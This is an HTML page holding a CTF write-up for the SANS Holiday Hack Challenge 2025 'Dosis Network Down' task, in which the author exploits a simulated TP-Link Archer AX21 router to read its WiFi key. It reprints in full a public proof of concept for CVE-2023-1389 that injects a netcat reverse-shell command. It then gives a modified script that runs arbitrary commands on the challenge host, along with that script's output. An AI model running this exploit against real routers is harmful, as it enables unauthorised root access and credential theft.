<!DOCTYPE html>
<html lang="en-us" dir="ltr" itemscope itemtype="http://schema.org/Article" data-r-output-format="html">
  <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <meta charset="utf-8">
    <meta name="viewport" content="height=device-height, width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <meta name="generator" content="Hugo 0.152.2">
    <meta name="generator" content="Relearn 8.2.0+926ba4d1230e27319cf62da0633eb3420e6af1bf">
    <meta name="description" content="Objective Difficulty: 2/5
Drop by JJ’s 24-7 for a network rescue and help restore the holiday cheer. What is the WiFi password found in the router’s config?
Janusz Jasinski mission statement Hello! I’m JJ. I like rock, metal, and punk music. That’s all I have to say about that.
I accept BTC.
Skeletor is my hero
Alright then. Those bloody gnomes ‘ave proper messed about with the neighborhood’s wifi - changed the admin password, probably mucked up all the settings, the lot.">
    <meta name="author" content="">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Dosis Network Down :: SANS Holiday Hack Challenge 2025">
    <meta name="twitter:description" content="Objective Difficulty: 2/5
Drop by JJ’s 24-7 for a network rescue and help restore the holiday cheer. What is the WiFi password found in the router’s config?
Janusz Jasinski mission statement Hello! I’m JJ. I like rock, metal, and punk music. That’s all I have to say about that.
I accept BTC.
Skeletor is my hero
Alright then. Those bloody gnomes ‘ave proper messed about with the neighborhood’s wifi - changed the admin password, probably mucked up all the settings, the lot.">
    <meta property="og:url" content="http://localhost:1313/act2/dosis-network-down/index.html">
    <meta property="og:site_name" content="SANS Holiday Hack Challenge 2025">
    <meta property="og:title" content="Dosis Network Down :: SANS Holiday Hack Challenge 2025">
    <meta property="og:description" content="Objective Difficulty: 2/5
Drop by JJ’s 24-7 for a network rescue and help restore the holiday cheer. What is the WiFi password found in the router’s config?
Janusz Jasinski mission statement Hello! I’m JJ. I like rock, metal, and punk music. That’s all I have to say about that.
I accept BTC.
Skeletor is my hero
Alright then. Those bloody gnomes ‘ave proper messed about with the neighborhood’s wifi - changed the admin password, probably mucked up all the settings, the lot.">
    <meta property="og:locale" content="en_us">
    <meta property="og:type" content="website">
    <meta itemprop="name" content="Dosis Network Down :: SANS Holiday Hack Challenge 2025">
    <meta itemprop="description" content="Objective Difficulty: 2/5
Drop by JJ’s 24-7 for a network rescue and help restore the holiday cheer. What is the WiFi password found in the router’s config?
Janusz Jasinski mission statement Hello! I’m JJ. I like rock, metal, and punk music. That’s all I have to say about that.
I accept BTC.
Skeletor is my hero
Alright then. Those bloody gnomes ‘ave proper messed about with the neighborhood’s wifi - changed the admin password, probably mucked up all the settings, the lot.">
    <meta itemprop="datePublished" content="2025-11-23T13:42:52+01:00">
    <meta itemprop="dateModified" content="2025-11-23T13:42:52+01:00">
    <meta itemprop="wordCount" content="932">
    <title>Dosis Network Down :: SANS Holiday Hack Challenge 2025</title>
    <link href="/act2/dosis-network-down/index.xml" rel="alternate" type="application/rss+xml" title="Dosis Network Down :: SANS Holiday Hack Challenge 2025">
    <link href="/css/auto-complete/auto-complete.min.css?1764489759" rel="stylesheet">
    <script src="/js/auto-complete/auto-complete.min.js?1764489759" defer></script>
    <script src="/js/search-lunr.js?1764489759" defer></script>
    <script src="/js/search.js?1764489759" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.index_js_url="/searchindex.en.js?1764489759";
    </script>
    <script src="/js/lunr/lunr.min.js?1764489759" defer></script>
    <script src="/js/lunr/lunr.stemmer.support.min.js?1764489759" defer></script>
    <script src="/js/lunr/lunr.multi.min.js?1764489759" defer></script>
    <script src="/js/lunr/lunr.en.min.js?1764489759" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.contentLangs=['en'];
    </script>
    <link href="/fonts/fontawesome/css/fontawesome-all.min.css?1764489759" rel="stylesheet" media="print" onload="this.media='all';this.onload=null;"><noscript><link href="/fonts/fontawesome/css/fontawesome-all.min.css?1764489759" rel="stylesheet"></noscript>
    <link href="/css/perfect-scrollbar/perfect-scrollbar.min.css?1764489759" rel="stylesheet">
    <link href="/css/theme.css?1764489759" rel="stylesheet">
    <link href="/css/format-html.css?1764489759" rel="stylesheet" id="R-format-style">
    <script>
      window.relearn = window.relearn || {};
      // configuration
      window.relearn.min = ``;
      window.relearn.path='\/act2\/dosis-network-down\/index.html';
      window.relearn.relBasePath='..\/..';
      window.relearn.relBaseUri='..\/..';
      window.relearn.absBaseUri='http:\/\/localhost:1313';
      window.relearn.disableAnchorCopy=false;
      window.relearn.disableAnchorScrolling=false;
      window.relearn.disableInlineCopyToClipboard=false;
      window.relearn.enableBlockCodeWrap=true;
      // legal
      window.relearn.getItem = (s,n) => {return s.getItem(n)};
      window.relearn.setItem = (s,n,v) => {return s.setItem(n,v)};
      window.relearn.removeItem = (s,n) => {return s.removeItem(n)};
      // translations
      window.T_Copy_to_clipboard = `Copy to clipboard`;
      window.T_Copied_to_clipboard = `Copied to clipboard!`;
      window.T_Copy_link_to_clipboard = `Copy link to clipboard`;
      window.T_Link_copied_to_clipboard = `Copied link to clipboard!`;
      window.T_Reset_view = `Reset view`;
      window.T_View_reset = `View reset!`;
      window.T_No_results_found = `No results found for "{0}"`;
      window.T_N_results_found = `{1} results found for "{0}"`;
      // variant stuff
      window.relearn.themevariants = [ 'hhc-2025' ];
      window.relearn.customvariantname = "my-custom-variant";
      window.relearn.changeVariant = function(variant) {
        var oldVariant = document.documentElement.dataset.rThemeVariant;
        window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        document.documentElement.dataset.rThemeVariant = variant;
        if (oldVariant != variant) {
          document.dispatchEvent( new CustomEvent('themeVariantLoaded', { detail: { variant, oldVariant } }) );
          window.relearn.markVariant();
        }
      }
      window.relearn.markVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant");
        document.querySelectorAll(".R-variantswitcher select").forEach((select) => {select.value = variant;});
      }
      window.relearn.initVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant") ?? "";
        if( variant == window.relearn.customvariantname ){
        }else if( !variant || !window.relearn.themevariants.includes(variant) ){
          variant = window.relearn.themevariants[0];
          window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        }
        document.documentElement.dataset.rThemeVariant = variant;
      }
      window.relearn.initVariant();
      window.relearn.markVariant();
    </script>
  </head>
  <body class="mobile-support html" data-url="/act2/dosis-network-down/index.html">
    <div id="R-body" class="default-animation">
      <div id="R-body-overlay"></div>
      <nav id="R-topbar">
        <div class="topbar-wrapper">
          <div class="topbar-sidebar-divider"></div>
          <div class="topbar-area topbar-area-start" data-area="start">
            <div class="topbar-button topbar-button-sidebar" data-content-empty="disable" data-width-s="show" data-width-m="hide" data-width-l="hide">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleNav()" type="button" title="Menu (CTRL&#43;ALT&#43;n)"><i class="fa-fw fas fa-bars"></i></button></span>
            </div>
            <div class="topbar-button topbar-button-toc" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="Table of Contents (CTRL&#43;ALT&#43;t)"><i class="fa-fw fas fa-list-alt"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
<nav class="TableOfContents">
  <ul>
    <li><a href="#objective">Objective</a></li>
    <li><a href="#janusz-jasinski-mission-statement">Janusz Jasinski mission statement</a></li>
    <li><a href="#dosis-network-down">Dosis Network Down</a></li>
    <li><a href="#janusz-jasinski-mission-debrief">Janusz Jasinski mission debrief</a></li>
  </ul>
</nav>
                </div>
              </div>
            </div>
          </div>
          <ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype="http://schema.org/BreadcrumbList"><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/index.html"><span itemprop="name">Intro</span></a><meta itemprop="position" content="1">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/act2/index.html"><span itemprop="name">Act 2</span></a><meta itemprop="position" content="2">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><span itemprop="name">Dosis Network Down</span><meta itemprop="position" content="3"></li>
          </ol>
          <div class="topbar-area topbar-area-end" data-area="end">
            <div class="topbar-button topbar-button-prev" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act2/idorable-bistro/index.html" title="Idorable Bistro (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-next" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act2/rogue-gnome-identity-provider/index.html" title="Rogue Gnome Identity Provider (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-more" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="More"><i class="fa-fw fas fa-ellipsis-v"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
                  <div class="topbar-area topbar-area-more" data-area="more">
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </nav>
      <div id="R-main-overlay"></div>
      <main id="R-body-inner" class="highlightable act2" tabindex="-1">
        <div class="flex-block-wrapper">
<article class="default">
  <header class="headline">
  </header>

<h1 id="dosis-network-down">Dosis Network Down</h1>

<p><a href="#R-image-8ce216d5a367a0c4fc347f86ee7803c3" class="lightbox-link"><img alt="Janusz Jasinski" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/januszjasinski-avatar.gif" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-8ce216d5a367a0c4fc347f86ee7803c3"><img alt="Janusz Jasinski" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/januszjasinski-avatar.gif"></a></p>
<h2 id="objective">Objective</h2>
<p>Difficulty: 2/5</p>
<p>Drop by JJ&rsquo;s 24-7 for a network rescue and help restore the holiday cheer. What is the WiFi password found in the router&rsquo;s config?</p>
<h2 id="janusz-jasinski-mission-statement">Janusz Jasinski mission statement</h2>
<blockquote>
<p>Hello! I&rsquo;m JJ. I like rock, metal, and punk music. That&rsquo;s all I have to say about that.</p>
<p>I accept BTC.</p>
<p>Skeletor is my hero</p>
<hr>
<p>Alright then. Those bloody gnomes &lsquo;ave proper messed about with the neighborhood&rsquo;s wifi - changed the admin password, probably mucked up all the settings, the lot.</p>
<p>Now I can&rsquo;t get online and it&rsquo;s doing me &rsquo;ead in, innit?</p>
<p>We own this router, so we&rsquo;re just takin&rsquo; back what&rsquo;s ours, yeah?</p>
<p>You reckon you can &rsquo;elp me &lsquo;ack past whatever chaos these little blighters left be&rsquo;ind?</p>
</blockquote>
<h2 id="dosis-network-down">Dosis Network Down</h2>
<p><a href="#R-image-5ca65ec3b3fc342020fecd493049bced" class="lightbox-link"><img alt="Router landingpage" class="lazy lightbox figure-image" loading="lazy" src="/images/act2/act2-dosisnetwork-1.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-5ca65ec3b3fc342020fecd493049bced"><img alt="Router landingpage" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act2/act2-dosisnetwork-1.png"></a></p>
<p>From the landing page we see a lot of information about the router:</p>
<ul>
<li>Dosis Neighborhood Core Router</li>
<li>AX1800 Wi-Fi 6 Router</li>
<li>Firmware Version: 1.1.4 Build 20230219 rel.69802</li>
<li>Hardware Version: Archer AX21 v2.0</li>
</ul>
<p>This information is kinda in your face and after Googling it, I found out this is most likely an TP-Link Archer AX21 and it has an interesting remote code execution flaw and a POC: <a href="https://www.exploit-db.com/exploits/51677" rel="external">https://www.exploit-db.com/exploits/51677</a>.</p>
<p>This is the POC:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/python3</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Date: 07/25/2023</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Vendor Homepage: https://www.tp-link.com/us/</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># CVE: CVE-2023-1389</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Disclaimer: This script is intended to be used for educational purposes only.</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Do not run this against any system that you do not have permission to test. </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># The author will not be held responsible for any use or damage caused by this </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># program. </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># CVE-2023-1389 is an unauthenticated command injection vulnerability in the web</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># management interface of the TP-Link Archer AX21 (AX1800), specifically, in the</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># *country* parameter of the *write* callback for the *country* form at the </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># &#34;/cgi-bin/luci/;stok=/locale&#34; endpoint. By modifying the country parameter it is </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># possible to run commands as root. Execution requires sending the request twice;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># the first request sets the command in the *country* value, and the second request </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># (which can be identical or not) executes it. </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This script is a short proof of concept to obtain a reverse shell. To read more </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># about the development of this script, you can read the blog post here:</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Before running the script, start a nc listener on your preferred port -&gt; run the script -&gt; profit</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> requests<span style="color:#f92672">,</span> urllib.parse<span style="color:#f92672">,</span> argparse
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> requests.packages.urllib3.exceptions <span style="color:#f92672">import</span> InsecureRequestWarning
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Suppress warning for connecting to a router with a self-signed certificate</span>
</span></span><span style="display:flex;"><span>requests<span style="color:#f92672">.</span>packages<span style="color:#f92672">.</span>urllib3<span style="color:#f92672">.</span>disable_warnings(InsecureRequestWarning)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Take user input for the router IP, and attacker IP and port</span>
</span></span><span style="display:flex;"><span>parser <span style="color:#f92672">=</span> argparse<span style="color:#f92672">.</span>ArgumentParser()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>parser<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#34;-r&#34;</span>, <span style="color:#e6db74">&#34;--router&#34;</span>, dest <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;router&#34;</span>, default <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;192.168.0.1&#34;</span>, help<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Router name&#34;</span>)
</span></span><span style="display:flex;"><span>parser<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#34;-a&#34;</span>, <span style="color:#e6db74">&#34;--attacker&#34;</span>, dest <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;attacker&#34;</span>, default <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;127.0.0.1&#34;</span>, help<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Attacker IP&#34;</span>)
</span></span><span style="display:flex;"><span>parser<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#34;-p&#34;</span>, <span style="color:#e6db74">&#34;--port&#34;</span>,dest <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;port&#34;</span>, default <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;9999&#34;</span>, help<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Local port&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>args <span style="color:#f92672">=</span> parser<span style="color:#f92672">.</span>parse_args()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Generate the reverse shell command with the attacker IP and port</span>
</span></span><span style="display:flex;"><span>revshell <span style="color:#f92672">=</span> urllib<span style="color:#f92672">.</span>parse<span style="color:#f92672">.</span>quote(<span style="color:#e6db74">&#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &#34;</span> <span style="color:#f92672">+</span> args<span style="color:#f92672">.</span>attacker <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34; &#34;</span> <span style="color:#f92672">+</span> args<span style="color:#f92672">.</span>port <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34; &gt;/tmp/f&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># URL to obtain the reverse shell</span>
</span></span><span style="display:flex;"><span>url_command <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://&#34;</span> <span style="color:#f92672">+</span> args<span style="color:#f92672">.</span>router <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(&#34;</span> <span style="color:#f92672">+</span> revshell <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;)&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Send the URL twice to run the command. Sending twice is necessary for the attack</span>
</span></span><span style="display:flex;"><span>r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(url_command, verify<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(url_command, verify<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)</span></span></code></pre></div>
<p>Interesting. By the look of it we are able to send commands to this endpoint: <code>/cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(&quot; + &lt;command_here&gt; + &quot;)</code>. howver, from the two last lines we must run the command twice in order for it to work. The POC uses a reverse shell, in tradion with SANS Holiday Hack Challenge I seriously doubt they expect us to do that. Instead, I took the route by customizing the POC to take my command as input and pass it on, then just print out the results from the second request:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests<span style="color:#f92672">,</span> urllib.parse<span style="color:#f92672">,</span> argparse
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> requests.packages.urllib3.exceptions <span style="color:#f92672">import</span> InsecureRequestWarning
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pprint <span style="color:#f92672">import</span> pprint
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Suppress warning for connecting to a router with a self-signed certificate</span>
</span></span><span style="display:flex;"><span>requests<span style="color:#f92672">.</span>packages<span style="color:#f92672">.</span>urllib3<span style="color:#f92672">.</span>disable_warnings(InsecureRequestWarning)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># command = &#34;ls -la /etc/init.d/&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>parser <span style="color:#f92672">=</span> argparse<span style="color:#f92672">.</span>ArgumentParser()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>parser<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#34;command&#34;</span>, help<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Local port&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>args <span style="color:#f92672">=</span> parser<span style="color:#f92672">.</span>parse_args()
</span></span><span style="display:flex;"><span>command <span style="color:#f92672">=</span> args<span style="color:#f92672">.</span>command
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>router <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dosis-network-down.holidayhackchallenge.com&#34;</span>
</span></span><span style="display:flex;"><span>url_command <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;https://</span><span style="color:#e6db74">{</span>router<span style="color:#e6db74">}</span><span style="color:#e6db74">/cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(</span><span style="color:#e6db74">{</span>command<span style="color:#e6db74">}</span><span style="color:#e6db74">)&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>pprint(url_command)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>r1 <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(url_command, verify<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>r2 <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(url_command, verify<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>print(r2<span style="color:#f92672">.</span>text)</span></span></code></pre></div>
<p>To operate this script we simply do:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>python3 main.py <span style="color:#e6db74">&#34;command here&#34;</span></span></span></code></pre></div>
<p>Example:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>python3 main.py <span style="color:#e6db74">&#34;ls */*&#34;</span></span></span></code></pre></div>
<p>The objective states that we have to find the WiFi password in the config, so what better place is it to look at <code>/etc/config</code></p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>python3 main<span style="color:#f92672">.</span>py <span style="color:#e6db74">&#34;ls /etc/config&#34;</span></span></span></code></pre></div>
<p>This is the output from my script:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>(<span style="color:#e6db74">&#39;https://dosis-network-down.holidayhackchallenge.com/cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(ls &#39;</span>
</span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;/etc/config)&#39;</span>)
</span></span><span style="display:flex;"><span>dhcp
</span></span><span style="display:flex;"><span>firewall
</span></span><span style="display:flex;"><span>leds
</span></span><span style="display:flex;"><span>network
</span></span><span style="display:flex;"><span>system
</span></span><span style="display:flex;"><span>wireless</span></span></code></pre></div>
<p>Since we are aiming to uncover the WiFi password, lets take a closer look at <code>wireless</code>:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>(<span style="color:#e6db74">&#39;https://dosis-network-down.holidayhackchallenge.com/cgi-bin/luci/;stok=/locale?form=country&amp;operation=write&amp;country=$(cat &#39;</span>
</span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;/etc/config/wireless)&#39;</span>)
</span></span><span style="display:flex;"><span>config wifi<span style="color:#f92672">-</span>device <span style="color:#e6db74">&#39;radio0&#39;</span>
</span></span><span style="display:flex;"><span>        option type <span style="color:#e6db74">&#39;mac80211&#39;</span>
</span></span><span style="display:flex;"><span>        option channel <span style="color:#e6db74">&#39;6&#39;</span>
</span></span><span style="display:flex;"><span>        option hwmode <span style="color:#e6db74">&#39;11g&#39;</span>
</span></span><span style="display:flex;"><span>        option path <span style="color:#e6db74">&#39;platform/ahb/18100000.wmac&#39;</span>
</span></span><span style="display:flex;"><span>        option htmode <span style="color:#e6db74">&#39;HT20&#39;</span>
</span></span><span style="display:flex;"><span>        option country <span style="color:#e6db74">&#39;US&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>config wifi<span style="color:#f92672">-</span>device <span style="color:#e6db74">&#39;radio1&#39;</span>
</span></span><span style="display:flex;"><span>        option type <span style="color:#e6db74">&#39;mac80211&#39;</span>
</span></span><span style="display:flex;"><span>        option channel <span style="color:#e6db74">&#39;36&#39;</span>
</span></span><span style="display:flex;"><span>        option hwmode <span style="color:#e6db74">&#39;11a&#39;</span>
</span></span><span style="display:flex;"><span>        option path <span style="color:#e6db74">&#39;pci0000:00/0000:00:00.0&#39;</span>
</span></span><span style="display:flex;"><span>        option htmode <span style="color:#e6db74">&#39;VHT80&#39;</span>
</span></span><span style="display:flex;"><span>        option country <span style="color:#e6db74">&#39;US&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>config wifi<span style="color:#f92672">-</span>iface <span style="color:#e6db74">&#39;default_radio0&#39;</span>
</span></span><span style="display:flex;"><span>        option device <span style="color:#e6db74">&#39;radio0&#39;</span>
</span></span><span style="display:flex;"><span>        option network <span style="color:#e6db74">&#39;lan&#39;</span>
</span></span><span style="display:flex;"><span>        option mode <span style="color:#e6db74">&#39;ap&#39;</span>
</span></span><span style="display:flex;"><span>        option ssid <span style="color:#e6db74">&#39;DOSIS-247_2.4G&#39;</span>
</span></span><span style="display:flex;"><span>        option encryption <span style="color:#e6db74">&#39;psk2&#39;</span>
</span></span><span style="display:flex;"><span>        option key <span style="color:#e6db74">&#39;SprinklesAndPackets2025!&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>config wifi<span style="color:#f92672">-</span>iface <span style="color:#e6db74">&#39;default_radio1&#39;</span>
</span></span><span style="display:flex;"><span>        option device <span style="color:#e6db74">&#39;radio1&#39;</span>
</span></span><span style="display:flex;"><span>        option network <span style="color:#e6db74">&#39;lan&#39;</span>
</span></span><span style="display:flex;"><span>        option mode <span style="color:#e6db74">&#39;ap&#39;</span>
</span></span><span style="display:flex;"><span>        option ssid <span style="color:#e6db74">&#39;DOSIS-247_5G&#39;</span>
</span></span><span style="display:flex;"><span>        option encryption <span style="color:#e6db74">&#39;psk2&#39;</span>
</span></span><span style="display:flex;"><span>        option key <span style="color:#e6db74">&#39;SprinklesAndPackets2025!&#39;</span></span></span></code></pre></div>
<p>And there we have it, the password is <code>SprinklesAndPackets2025!</code></p>
<h2 id="janusz-jasinski-mission-debrief">Janusz Jasinski mission debrief</h2>
<blockquote>
<p>Brilliant work, that. Got me connection back and sent those gnomes packin&rsquo; from the router.</p>
<p>Now I can finally get back to streamin&rsquo; some proper metal. BTC tips accepted, by the way.</p>
</blockquote>

  <footer class="footline">
              <i class='fa-fw fas fa-calendar'></i> Nov 23, 2025
  </footer>
</article>
        </div>
      </main>
    </div>
    <aside id="R-sidebar" class="default-animation">
      <div id="R-header-topbar" class="default-animation"></div>
      <div id="R-header-wrapper" class="default-animation">
        <div id="R-header" class="default-animation">
          <a id="R-logo" class="R-default" href="/index.html">
            <div class="logo-title">SANS Holiday Hack Challenge 2025</div>
          </a>
        </div>
        <search><form action="/search/index.html" method="get">
          <div class="searchbox default-animation">
            <button class="search-detail" type="submit" title="Search (CTRL+ALT+f)"><i class="fas fa-search"></i></button>
            <label class="a11y-only" for="R-search-by">Search</label>
            <input data-search-input id="R-search-by" name="search-by" class="search-by" type="search" placeholder="Search...">
            <button class="search-clear" type="button" data-search-clear="" title="Clear search"><i class="fas fa-times" title="Clear search"></i></button>
          </div>
        </form></search>
      </div>
      <div id="R-homelinks" class="default-animation homelinks">
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-homelinks">
          <ul class="space collapsible-menu">
            <li class="" data-nav-url="/index.html"><a class="padding" href="/index.html"><i class="fa-fw fas fa-home"></i> Home</a></li>
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
